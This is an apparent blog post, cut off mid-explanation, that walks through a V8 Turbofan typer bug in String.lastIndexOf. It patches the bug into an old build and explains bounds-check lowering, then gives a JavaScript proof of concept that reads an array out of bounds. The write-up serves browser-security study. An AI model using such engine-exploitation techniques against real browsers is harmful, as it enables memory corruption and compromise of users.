<!doctype html>
<html lang="en-us">
  <head>
    <title>Turbofan Wrong Type on String indexOf and lastIndexOf // Xploiter</title>
    <link rel="shortcut icon" href="/favicon.ico" />
    <meta charset="utf-8" />
    <meta name="generator" content="Hugo 0.87.0" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="author" content="John Sherchan" />
    <meta name="description" content="" />
    <link rel="stylesheet" href="https://xpldotjs.github.io/css/main.min.88e7083eff65effb7485b6e6f38d10afbec25093a6fac42d734ce9024d3defbd.css" />

    
    <meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Turbofan Wrong Type on String indexOf and lastIndexOf"/>
<meta name="twitter:description" content="Overview In this section we&rsquo;ll be focusing on checkbounds and try to bypass it. The bug used in this section is String.indexOf | String.lastIndexOf bug where the typer computed incorrect type for kStringIndexOf or kStringPrototypeIndexOf and kStringLastIndexOf or kStringPrototypeLastIndexOf. This post heavily rely of doar-e blog.
Setup fetch v8 git reset --hard 8cd4009c5b7072ad224f19a9e668ec0ed7430599 gclient sync Now we&rsquo;ll apply the patch to enable the lastIndexOf bug. We&rsquo;ll replace this code:
// src/compiler/typer."/>

    <meta property="og:title" content="Turbofan Wrong Type on String indexOf and lastIndexOf" />
<meta property="og:description" content="Overview In this section we&rsquo;ll be focusing on checkbounds and try to bypass it. The bug used in this section is String.indexOf | String.lastIndexOf bug where the typer computed incorrect type for kStringIndexOf or kStringPrototypeIndexOf and kStringLastIndexOf or kStringPrototypeLastIndexOf. This post heavily rely of doar-e blog.
Setup fetch v8 git reset --hard 8cd4009c5b7072ad224f19a9e668ec0ed7430599 gclient sync Now we&rsquo;ll apply the patch to enable the lastIndexOf bug. We&rsquo;ll replace this code:
// src/compiler/typer." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://xpldotjs.github.io/posts/turbofan-wrong-type-on-string-indexof-and-lastindexof/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2021-08-28T15:37:18+05:45" />
<meta property="article:modified_time" content="2021-08-28T15:37:18+05:45" />



  </head>
  <body>
    <header class="app-header">
      <a href="https://xpldotjs.github.io"><img class="app-header-avatar" src="/avatar.jpg" alt="John Sherchan" /></a>
      <h1>Xploiter</h1>
      <nav class="app-header-menu">
          <a class="app-header-menu-item" href="/tags/">Tags</a>
      </nav>
      <p>In love with Browser Exploitation</p>
      <div class="app-header-social">
        
          <a href="https://github.com/xpldotjs" target="_blank" rel="noreferrer noopener">
            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-github">
  <title>My Github</title>
  <path d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22"></path>
</svg>
          </a>
        
          <a href="https://www.facebook.com/john.sherchan.9/" target="_blank" rel="noreferrer noopener">
            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-facebook">
  <title>My Facebook</title>
  <path d="M18 2h-3a5 5 0 0 0-5 5v3H7v4h3v8h4v-8h3l1-4h-4V7a1 1 0 0 1 1-1h3z"></path>
</svg>
          </a>
        
      </div>
    </header>
    <main class="app-container">
      
  <article class="post">
    <header class="post-header">
      <h1 class ="post-title">Turbofan Wrong Type on String indexOf and lastIndexOf</h1>
      <div class="post-meta">
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-calendar">
  <title>calendar</title>
  <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect><line x1="16" y1="2" x2="16" y2="6"></line><line x1="8" y1="2" x2="8" y2="6"></line><line x1="3" y1="10" x2="21" y2="10"></line>
</svg>
          Aug 28, 2021
        </div>
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-clock">
  <title>clock</title>
  <circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline>
</svg>
          8 min read
        </div>
      </div>
    </header>
    <div class="post-content">
      <h2 id="overview">Overview</h2>
<p>In this section we&rsquo;ll be focusing on <code>checkbounds</code> and try to bypass it.  The bug used in this section is <a href="https://chromium-review.googlesource.com/c/v8/v8/+/660000/">String.indexOf | String.lastIndexOf bug</a> where the typer computed incorrect type for <code>kStringIndexOf or kStringPrototypeIndexOf</code> and <code>kStringLastIndexOf or kStringPrototypeLastIndexOf</code>. This post heavily rely of <a href="https://doar-e.github.io/blog/2019/05/09/circumventing-chromes-hardening-of-typer-bugs/">doar-e</a> blog.</p>
<h4 id="setup">Setup</h4>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">fetch v8
git reset --hard 8cd4009c5b7072ad224f19a9e668ec0ed7430599
gclient sync
</code></pre></div><p>Now we&rsquo;ll apply the patch to enable the <code>lastIndexOf</code> bug. We&rsquo;ll replace this code:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-C++" data-lang="C++"><span style="color:#75715e">// src/compiler/typer.cc
</span><span style="color:#75715e"></span>    <span style="color:#66d9ef">case</span> Builtins<span style="color:#f92672">::</span>kStringPrototypeLastIndexOf:
      <span style="color:#66d9ef">return</span> Type<span style="color:#f92672">::</span>Range(<span style="color:#f92672">-</span><span style="color:#ae81ff">1.0</span>, String<span style="color:#f92672">::</span>kMaxLength, t<span style="color:#f92672">-&gt;</span>zone());
</code></pre></div><p>To</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-C++" data-lang="C++"><span style="color:#75715e">// src/compiler/typer.cc
</span><span style="color:#75715e"></span>    <span style="color:#66d9ef">case</span> Builtins<span style="color:#f92672">::</span>kStringPrototypeLastIndexOf:
      <span style="color:#66d9ef">return</span> Type<span style="color:#f92672">::</span>Range(<span style="color:#f92672">-</span><span style="color:#ae81ff">1.0</span>, String<span style="color:#f92672">::</span>kMaxLength <span style="color:#f92672">-</span> <span style="color:#ae81ff">1.0</span>, t<span style="color:#f92672">-&gt;</span>zone());
</code></pre></div><p>Now we&rsquo;ll compile the buggy d8 shell.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">tools/dev/gm.py x64.debug
ninja -C out/x64.debug d8
</code></pre></div><h4 id="checkbounds">CheckBounds</h4>
<p>Before this <a href="https://chromium.googlesource.com/v8/v8/+/7bb6dc0e06fa158df508bc8997f0fce4e33512a5">commit</a> exploiters were taking advantage of Bound-Check-Elemination to get read-write primitive from the typer bug. As discuss in this <a href="/posts/v8-notes/">post</a>, checkbounds prevents array from accessing index out of range and make sure the index is always less than the length. Prior to this <a href="https://chromium.googlesource.com/v8/v8/+/7bb6dc0e06fa158df508bc8997f0fce4e33512a5">commit</a>, if the index was less than the length the <code>CheckBounds</code> node gets eliminated and removed from during simplified lowering.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-C++" data-lang="C++"><span style="color:#75715e">// src/compiler/simplified-lowering.cc
</span><span style="color:#75715e"></span><span style="color:#66d9ef">void</span> <span style="color:#a6e22e">VisitCheckBounds</span>(Node<span style="color:#f92672">*</span> node, SimplifiedLowering<span style="color:#f92672">*</span> lowering) {
    CheckParameters <span style="color:#66d9ef">const</span><span style="color:#f92672">&amp;</span> p <span style="color:#f92672">=</span> CheckParametersOf(node<span style="color:#f92672">-&gt;</span>op());
    Type <span style="color:#66d9ef">const</span> index_type <span style="color:#f92672">=</span> TypeOf(node<span style="color:#f92672">-&gt;</span>InputAt(<span style="color:#ae81ff">0</span>));
    Type <span style="color:#66d9ef">const</span> length_type <span style="color:#f92672">=</span> TypeOf(node<span style="color:#f92672">-&gt;</span>InputAt(<span style="color:#ae81ff">1</span>));
    <span style="color:#75715e">// [...]
</span><span style="color:#75715e"></span>        <span style="color:#66d9ef">if</span> (lower()) {
            <span style="color:#66d9ef">if</span> (index_type<span style="color:#f92672">-&gt;</span>Min() <span style="color:#f92672">&gt;=</span> <span style="color:#ae81ff">0.0</span> <span style="color:#f92672">&amp;&amp;</span>
                index_type<span style="color:#f92672">-&gt;</span>Max() <span style="color:#f92672">&lt;</span> length_type<span style="color:#f92672">-&gt;</span>Min()) {
              <span style="color:#75715e">// The bounds check is redundant if we already know that
</span><span style="color:#75715e"></span>              <span style="color:#75715e">// the index is within the bounds of [0.0, length[.
</span><span style="display:block;width:100%;background-color:#3c3d38"><span style="color:#75715e"></span>              DeferReplacement(node, node<span style="color:#f92672">-&gt;</span>InputAt(<span style="color:#ae81ff">0</span>));
</span>            }
          }
      <span style="color:#75715e">// [...]
</span><span style="color:#75715e"></span>  }
</code></pre></div><p>However now it&rsquo;s not the case, instead of eliminating the <code>CheckBounds</code> node, they introduce an aborting bounds checks that crashes rather than deopts. Then It&rsquo;ll lower into the <code>CheckedUint32Bounds</code> while visiting checkbounds in simplified lowering.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-C++" data-lang="C++"><span style="color:#75715e">// src/compiler/simplified-lowering.cc
</span><span style="color:#75715e"></span><span style="color:#66d9ef">void</span> <span style="color:#a6e22e">VisitCheckBounds</span>(Node<span style="color:#f92672">*</span> node, SimplifiedLowering<span style="color:#f92672">*</span> lowering) {
    CheckParameters <span style="color:#66d9ef">const</span><span style="color:#f92672">&amp;</span> p <span style="color:#f92672">=</span> CheckParametersOf(node<span style="color:#f92672">-&gt;</span>op());
    Type <span style="color:#66d9ef">const</span> index_type <span style="color:#f92672">=</span> TypeOf(node<span style="color:#f92672">-&gt;</span>InputAt(<span style="color:#ae81ff">0</span>));
    Type <span style="color:#66d9ef">const</span> length_type <span style="color:#f92672">=</span> TypeOf(node<span style="color:#f92672">-&gt;</span>InputAt(<span style="color:#ae81ff">1</span>));
    <span style="color:#75715e">// [...]
</span><span style="color:#75715e"></span>        <span style="color:#66d9ef">if</span> (lower()) {
          CheckBoundsParameters<span style="color:#f92672">::</span>Mode mode <span style="color:#f92672">=</span>
              CheckBoundsParameters<span style="color:#f92672">::</span>kDeoptOnOutOfBounds;
          <span style="color:#66d9ef">if</span> (lowering<span style="color:#f92672">-&gt;</span>poisoning_level_ <span style="color:#f92672">==</span>
                  PoisoningMitigationLevel<span style="color:#f92672">::</span>kDontPoison <span style="color:#f92672">&amp;&amp;</span>
              (index_type.IsNone() <span style="color:#f92672">||</span> length_type.IsNone() <span style="color:#f92672">||</span>
               (index_type.Min() <span style="color:#f92672">&gt;=</span> <span style="color:#ae81ff">0.0</span> <span style="color:#f92672">&amp;&amp;</span>
                index_type.Max() <span style="color:#f92672">&lt;</span> length_type.Min()))) {
            <span style="color:#75715e">// The bounds check is redundant if we already know that
</span><span style="color:#75715e"></span>            <span style="color:#75715e">// the index is within the bounds of [0.0, length[.
</span><span style="display:block;width:100%;background-color:#3c3d38"><span style="color:#75715e"></span>            mode <span style="color:#f92672">=</span> CheckBoundsParameters<span style="color:#f92672">::</span>kAbortOnOutOfBounds;
</span>          }
<span style="display:block;width:100%;background-color:#3c3d38">          NodeProperties<span style="color:#f92672">::</span>ChangeOp(
</span><span style="display:block;width:100%;background-color:#3c3d38">              node, simplified()<span style="color:#f92672">-&gt;</span>CheckedUint32Bounds(p.feedback(), mode));
</span>        }
      } 
      <span style="color:#75715e">// [...]
</span><span style="color:#75715e"></span>  }
</code></pre></div><p>Also the <code>CheckUint32Bounds</code> node gets lowered in <code>EffectControlLinearizer</code>. And in case of out-of-bounds there&rsquo;ll be nodeoptimization instead it&rsquo;ll reach to the <code>Unreachable</code> node.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-C++" data-lang="C++"><span style="color:#75715e">// src/compiler/effect-control-linearizer.cc
</span><span style="color:#75715e"></span>Node<span style="color:#f92672">*</span> EffectControlLinearizer<span style="color:#f92672">::</span>LowerCheckedUint32Bounds(Node<span style="color:#f92672">*</span> node,
                                                        Node<span style="color:#f92672">*</span> frame_state) {
  Node<span style="color:#f92672">*</span> index <span style="color:#f92672">=</span> node<span style="color:#f92672">-&gt;</span>InputAt(<span style="color:#ae81ff">0</span>);
  Node<span style="color:#f92672">*</span> limit <span style="color:#f92672">=</span> node<span style="color:#f92672">-&gt;</span>InputAt(<span style="color:#ae81ff">1</span>);
  <span style="color:#66d9ef">const</span> CheckBoundsParameters<span style="color:#f92672">&amp;</span> params <span style="color:#f92672">=</span> CheckBoundsParametersOf(node<span style="color:#f92672">-&gt;</span>op());

  Node<span style="color:#f92672">*</span> check <span style="color:#f92672">=</span> __ Uint32LessThan(index, limit);
  <span style="color:#66d9ef">switch</span> (params.mode()) {
      <span style="color:#75715e">// do not deoptimize in case of out-of-bounds
</span><span style="color:#75715e"></span>    <span style="color:#66d9ef">case</span> CheckBoundsParameters<span style="color:#f92672">::</span>kDeoptOnOutOfBounds:
<span style="display:block;width:100%;background-color:#3c3d38">      __ DeoptimizeIfNot(DeoptimizeReason<span style="color:#f92672">::</span>kOutOfBounds,
</span><span style="display:block;width:100%;background-color:#3c3d38">                         params.check_parameters().feedback(), check,
</span><span style="display:block;width:100%;background-color:#3c3d38">                         frame_state, IsSafetyCheck<span style="color:#f92672">::</span>kCriticalSafetyCheck);
</span>      <span style="color:#66d9ef">break</span>;
      <span style="color:#75715e">// Reach to Unreachable node in case of &#39;kAbortOnOutOfBounds&#39;
</span><span style="color:#75715e"></span>    <span style="color:#66d9ef">case</span> CheckBoundsParameters<span style="color:#f92672">::</span>kAbortOnOutOfBounds: {
      <span style="color:#66d9ef">auto</span> if_abort <span style="color:#f92672">=</span> __ MakeDeferredLabel();
      <span style="color:#66d9ef">auto</span> done <span style="color:#f92672">=</span> __ MakeLabel();

      __ <span style="color:#a6e22e">Branch</span>(check, <span style="color:#f92672">&amp;</span>done, <span style="color:#f92672">&amp;</span>if_abort);

      __ <span style="color:#a6e22e">Bind</span>(<span style="color:#f92672">&amp;</span>if_abort);
<span style="display:block;width:100%;background-color:#3c3d38">      __ <span style="color:#a6e22e">Unreachable</span>();
</span>      __ <span style="color:#a6e22e">Goto</span>(<span style="color:#f92672">&amp;</span>done);

      __ <span style="color:#a6e22e">Bind</span>(<span style="color:#f92672">&amp;</span>done);
      <span style="color:#66d9ef">break</span>;
    }
  }

  <span style="color:#66d9ef">return</span> index;
}
</code></pre></div><p>Now if we further dig into the code, we can see that in <code>MachineOperatorReducer::Reduce</code> function <code>Uint32LessThan</code> node can lower to <code>UInt32Constant</code>.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-C++" data-lang="C++"><span style="color:#75715e">// Perform constant folding and strength reduction on machine operators.
</span><span style="color:#75715e"></span>Reduction MachineOperatorReducer<span style="color:#f92672">::</span>Reduce(Node<span style="color:#f92672">*</span> node) {
  <span style="color:#66d9ef">switch</span> (node<span style="color:#f92672">-&gt;</span>opcode()) {
   <span style="color:#75715e">// [...]
</span><span style="color:#75715e"></span>    <span style="color:#66d9ef">case</span> IrOpcode<span style="color:#f92672">::</span>kUint32LessThan: {
      Uint32BinopMatcher <span style="color:#a6e22e">m</span>(node);
      <span style="color:#66d9ef">if</span> (m.left().Is(kMaxUInt32)) <span style="color:#66d9ef">return</span> ReplaceBool(false);  <span style="color:#75715e">// M &lt; x =&gt; false
</span><span style="color:#75715e"></span>      <span style="color:#66d9ef">if</span> (m.right().Is(<span style="color:#ae81ff">0</span>)) <span style="color:#66d9ef">return</span> ReplaceBool(false);          <span style="color:#75715e">// x &lt; 0 =&gt; false
</span><span style="color:#75715e"></span>      <span style="color:#66d9ef">if</span> (m.IsFoldable()) {                                    <span style="color:#75715e">// K &lt; K =&gt; K
</span><span style="color:#75715e"></span>        <span style="color:#66d9ef">return</span> <span style="color:#a6e22e">ReplaceBool</span>(m.left().Value() <span style="color:#f92672">&lt;</span> m.right().Value());
      }
      <span style="color:#66d9ef">if</span> (m.LeftEqualsRight()) <span style="color:#66d9ef">return</span> ReplaceBool(false);  <span style="color:#75715e">// x &lt; x =&gt; false
</span><span style="color:#75715e"></span>      <span style="color:#66d9ef">if</span> (m.left().IsWord32Sar() <span style="color:#f92672">&amp;&amp;</span> m.right().HasValue()) {
        Int32BinopMatcher <span style="color:#a6e22e">mleft</span>(m.left().node());
        <span style="color:#66d9ef">if</span> (mleft.right().HasValue()) {
          <span style="color:#75715e">// (x &gt;&gt; K) &lt; C =&gt; x &lt; (C &lt;&lt; K)
</span><span style="color:#75715e"></span>          <span style="color:#75715e">// when C &lt; (M &gt;&gt; K)
</span><span style="color:#75715e"></span>          <span style="color:#66d9ef">const</span> <span style="color:#66d9ef">uint32_t</span> c <span style="color:#f92672">=</span> m.right().Value();
          <span style="color:#66d9ef">const</span> <span style="color:#66d9ef">uint32_t</span> k <span style="color:#f92672">=</span> mleft.right().Value() <span style="color:#f92672">&amp;</span> <span style="color:#ae81ff">0x1F</span>;
          <span style="color:#66d9ef">if</span> (c <span style="color:#f92672">&lt;</span> <span style="color:#66d9ef">static_cast</span><span style="color:#f92672">&lt;</span><span style="color:#66d9ef">uint32_t</span><span style="color:#f92672">&gt;</span>(kMaxInt <span style="color:#f92672">&gt;&gt;</span> k)) {
            node<span style="color:#f92672">-&gt;</span>ReplaceInput(<span style="color:#ae81ff">0</span>, mleft.left().node());
            node<span style="color:#f92672">-&gt;</span>ReplaceInput(<span style="color:#ae81ff">1</span>, Uint32Constant(c <span style="color:#f92672">&lt;&lt;</span> k));
            <span style="color:#66d9ef">return</span> <span style="color:#a6e22e">Changed</span>(node);
          }
          <span style="color:#75715e">// TODO(turbofan): else the comparison is always true.
</span><span style="color:#75715e"></span>        }
      }
      <span style="color:#66d9ef">break</span>;
    }
</code></pre></div><h3 id="analyzing-some-behavior">Analyzing some behavior</h3>
<p>Sample code:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-js" data-lang="js"><span style="color:#66d9ef">function</span> <span style="color:#a6e22e">opt_demo</span>() {
	<span style="color:#66d9ef">let</span> <span style="color:#a6e22e">arr</span> <span style="color:#f92672">=</span> [<span style="color:#ae81ff">1.1</span>,<span style="color:#ae81ff">1.2</span>,<span style="color:#ae81ff">1.3</span>];
	<span style="color:#66d9ef">let</span> <span style="color:#a6e22e">idx</span> <span style="color:#f92672">=</span> <span style="color:#ae81ff">4</span>;
	<span style="color:#66d9ef">return</span> <span style="color:#a6e22e">arr</span>[<span style="color:#a6e22e">idx</span>];
}

<span style="color:#a6e22e">opt_demo</span>();
<span style="color:#f92672">%</span><span style="color:#a6e22e">OptimizeFunctionOnNextCall</span>(<span style="color:#a6e22e">opt_demo</span>);
<span style="color:#a6e22e">opt_demo</span>();
</code></pre></div><p>We can see that the <code>NumberLessThan</code> node as well as <code>CheckBounds</code> node are generated in <code>Typer</code> Phase. Here if the <code>NumberLessThan</code> node returns <code>True</code> the <code>LoadElement</code> will load the number and return else it&rsquo;ll return nothing, as seen in the following image.</p>
<p><img src="/posts/static/StringIndexOf/002-numberlessthan-sample-turbo.png" alt="turbofan-ss"></p>
<p>So what&rsquo;s inside the <code>NumberLessThan</code> node?</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-C++" data-lang="C++">Reduction TypeNarrowingReducer<span style="color:#f92672">::</span>Reduce(Node<span style="color:#f92672">*</span> node) {
  DisallowHeapAccess no_heap_access;

  Type new_type <span style="color:#f92672">=</span> Type<span style="color:#f92672">::</span>Any();

  <span style="color:#66d9ef">switch</span> (node<span style="color:#f92672">-&gt;</span>opcode()) {
    <span style="color:#66d9ef">case</span> IrOpcode<span style="color:#f92672">::</span>kNumberLessThan: {
      <span style="color:#75715e">// TODO(turbofan) Reuse the logic from typer.cc (by integrating relational
</span><span style="color:#75715e"></span>      <span style="color:#75715e">// comparisons with the operation typer).
</span><span style="color:#75715e"></span>      Type left_type <span style="color:#f92672">=</span> NodeProperties<span style="color:#f92672">::</span>GetType(node<span style="color:#f92672">-&gt;</span>InputAt(<span style="color:#ae81ff">0</span>));
      Type right_type <span style="color:#f92672">=</span> NodeProperties<span style="color:#f92672">::</span>GetType(node<span style="color:#f92672">-&gt;</span>InputAt(<span style="color:#ae81ff">1</span>));
      <span style="color:#66d9ef">if</span> (left_type.Is(Type<span style="color:#f92672">::</span>PlainNumber()) <span style="color:#f92672">&amp;&amp;</span>
          right_type.Is(Type<span style="color:#f92672">::</span>PlainNumber())) {
<span style="display:block;width:100%;background-color:#3c3d38">        <span style="color:#66d9ef">if</span> (left_type.Max() <span style="color:#f92672">&lt;</span> right_type.Min()) { 
</span><span style="display:block;width:100%;background-color:#3c3d38">          new_type <span style="color:#f92672">=</span> op_typer_.singleton_true();    <span style="color:#75715e">// [1]
</span></span><span style="color:#75715e"></span>        } <span style="color:#66d9ef">else</span> <span style="color:#a6e22e">if</span> (left_type.Min() <span style="color:#f92672">&gt;=</span> right_type.Max()) {
          new_type <span style="color:#f92672">=</span> op_typer_.singleton_false();
        }
      }
      <span style="color:#66d9ef">break</span>;
      <span style="color:#75715e">// [...]
</span><span style="color:#75715e"></span>    }

  Type original_type <span style="color:#f92672">=</span> NodeProperties<span style="color:#f92672">::</span>GetType(node);
  Type <span style="color:#66d9ef">restricted</span> <span style="color:#f92672">=</span> Type<span style="color:#f92672">::</span>Intersect(new_type, original_type, zone());
  <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>original_type.Is(<span style="color:#66d9ef">restricted</span>)) {
<span style="display:block;width:100%;background-color:#3c3d38">    NodeProperties<span style="color:#f92672">::</span>SetType(node, <span style="color:#66d9ef">restricted</span>); <span style="color:#75715e">// [2] if singleton_true
</span></span><span style="display:block;width:100%;background-color:#3c3d38"><span style="color:#75715e"></span>    <span style="color:#66d9ef">return</span> <span style="color:#a6e22e">Changed</span>(node);
</span>  }
  <span style="color:#66d9ef">return</span> <span style="color:#a6e22e">NoChange</span>();
  }
}
</code></pre></div><p>If the <code>left_type.Max()</code> is always less than <code>right_type.Min()</code>, <code>new_type</code> will be set to <code>singleton_true()</code> and the type of the node gets changed to restricted i.e, in this case <code>new_type</code>.</p>
<p><code>TypeNarrowingReducer::Reduce(Node* node)</code> is being called from the <code>LoadEliminationPhase</code> where <code>kNumberLessThan</code> will be switched.</p>
<p><img src="/posts/static/StringIndexOf/003-load-elimination.png" alt="loadelimination"></p>
<p>With our sample code we failed to set <code>new_type</code> to <code>singleton_true()</code> because the condition doesn&rsquo;t met.</p>
<ol>
<li><code>left_type.Max()</code> = 4</li>
<li><code>right_type.Min()</code> = 3</li>
</ol>
<p>In this case <code>left_type.Max() &lt; right_type.Min()</code> is always false.</p>
<p><img src="/posts/static/StringIndexOf/004-type-left-right.png" alt="left-right-type"></p>
<p>If we further dig into it.</p>
<p><img src="/posts/static/StringIndexOf/004-type-left-right-in-depth.png" alt="left-right-type"></p>
<p>As we can see in the above image that the <code>left_type.Max()</code> is the value from <code>CheckBounds</code> node and the <code>right_type.Min()</code> is the length of our array. Also, we can confirm that the <code>left_type.Max()</code> is the index. So lets modify the code in such way that the <code>left_type.Max()</code> always remain less than <code>right_type.Min()</code> which we&rsquo;ll do with the help of <code>typer</code> bug <code>lastIndexOf</code>.</p>
<h3 id="writing-poc">Writing POC</h3>
<p>Writing the POC has always been the hardest part for me even if i understand the bug. Because sometime it&rsquo;s quite tricky to trigger the bug. Let&rsquo;s see what we&rsquo;ve got till now</p>
<ol>
<li>In simplified lowering <code>checkbounds</code> node doesn&rsquo;t get eliminated instead <code>kAbortOnOutOfBounds</code> mode is set and lowered to the <code>CheckUint32Bounds</code>.</li>
<li><code>CheckUint32Bounds</code> node then lowered to <code>Uint32LessThan</code> node in <code>EffectControlLinearizer</code>.</li>
<li>The typer calculates the incorrect range for <code>kStringPrototypeLastIndexOf</code> i.e., <code>return Type::Range(-1.0, String::kMaxLength - 1.0, t-&gt;zone());</code> instead of <code>return Type::Range(-1.0, String::kMaxLength, t-&gt;zone());</code></li>
</ol>
<p>Poc Writing Steps:</p>
<ol>
<li>First we&rsquo;ll create a <code>string</code> which is of length <code>kMaxLength = 1073741799</code></li>
<li>Then we&rsquo;ll try to get last index of the <code>string</code> which should return <code>1073741799</code> in actual. But at this point typer thinks that it&rsquo;s in range <code>Range(-1.0, 1073741798)</code></li>
<li>Now we&rsquo;ll modify returned value <code>1073741799</code> in such a way that it would not be <code>0</code> but the typer assumed value <code>1073741798</code> would be <code>0</code> or less than the <code>right_type.Min()</code> but <code>0</code> would be best.</li>
</ol>
<p>Let&rsquo;s begin:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-js" data-lang="js"><span style="color:#66d9ef">let</span> <span style="color:#a6e22e">str</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;aaaaaaa&#34;</span><span style="color:#f92672">+</span><span style="color:#e6db74">&#34;xpldotjs&#34;</span>.<span style="color:#a6e22e">repeat</span>(<span style="color:#ae81ff">134217724</span>); <span style="color:#75715e">// [1]
</span><span style="color:#75715e"></span><span style="color:#66d9ef">function</span> <span style="color:#a6e22e">trigger</span>() {
	<span style="color:#66d9ef">let</span> <span style="color:#a6e22e">idx</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">str</span>.<span style="color:#a6e22e">lastIndexOf</span>(<span style="color:#e6db74">&#39;&#39;</span>); <span style="color:#75715e">// typer: Range(-1, 1073741798), actual: (-1, 1073741799)
</span><span style="color:#75715e"></span>	<span style="color:#a6e22e">idx</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">idx</span> <span style="color:#f92672">+</span> <span style="color:#ae81ff">25</span>;   <span style="color:#75715e">// [2]: typer: 1073741798 + 25 = 1073741823, actual: 1073741799 + 25 = 1073741824
</span><span style="color:#75715e"></span>	<span style="color:#a6e22e">idx</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">idx</span> <span style="color:#f92672">&gt;&gt;</span> <span style="color:#ae81ff">30</span>;  <span style="color:#75715e">// [3]: typer: 1073741823 &gt;&gt; 30 = 0, actual: 1073741824 &gt;&gt; 30 = 1
</span><span style="color:#75715e"></span>	<span style="color:#a6e22e">idx</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">idx</span> <span style="color:#f92672">*</span> <span style="color:#ae81ff">4</span>;    <span style="color:#75715e">// [4]: typer: 0 * 4 = 0, actual: 1 * 4 = 4
</span><span style="color:#75715e"></span>	<span style="color:#66d9ef">let</span> <span style="color:#a6e22e">arr</span> <span style="color:#f92672">=</span> [<span style="color:#ae81ff">1.1</span>,<span style="color:#ae81ff">1.2</span>]; <span style="color:#75715e">// [5] oob
</span><span style="color:#75715e"></span>	<span style="color:#66d9ef">return</span> <span style="color:#a6e22e">arr</span>[<span style="color:#a6e22e">idx</span>];
}

<span style="color:#a6e22e">console</span>.<span style="color:#a6e22e">log</span>(<span style="color:#a6e22e">trigger</span>());
<span style="color:#f92672">%</span><span style="color:#a6e22e">OptimizeFunctionOnNextCall</span>(<span style="color:#a6e22e">trigger</span>);
<span style="color:#a6e22e">console</span>.<span style="color:#a6e22e">log</span>(<span style="color:#a6e22e">trigger</span>());
</code></pre></div><p>In the POC, we created a string with length <code>1073741799</code> [ 1 ]. Then we called the <code>lastIndexOf</code> function which gives the result <code>1073741799</code> and we know this because the fact is that it&rsquo;s the length of the string that we&rsquo;ve created. But, because of the <code>Incorrect</code> typing Turbofan generates the rage of <code>Range(-1, 1073741798)</code>. Then we added <code>+25</code> in the <code>idx</code> variable. It is because 1073741798. So the question is why adding <code>25</code>? Because the right shift <code>30</code> is <code>2 power 30 = 1073741824</code> and when we add <code>idx</code> variable with <code>25</code> it becomes <code>1073741799 + 25 = 1073741824</code> in actual, but in <code>typer</code> it&rsquo;s <code>1073741798 + 25 = 1073741823</code>. So if we right shift the <code>idx</code> variable with <code>30</code> after adding <code>25</code></p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">1. Typer: idx <span style="color:#f92672">=</span> 1073741823; idx &gt;&gt; 30 <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>   
    this is equivalent to <span style="color:#ae81ff">1073741823</span> / 1073741824 <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>
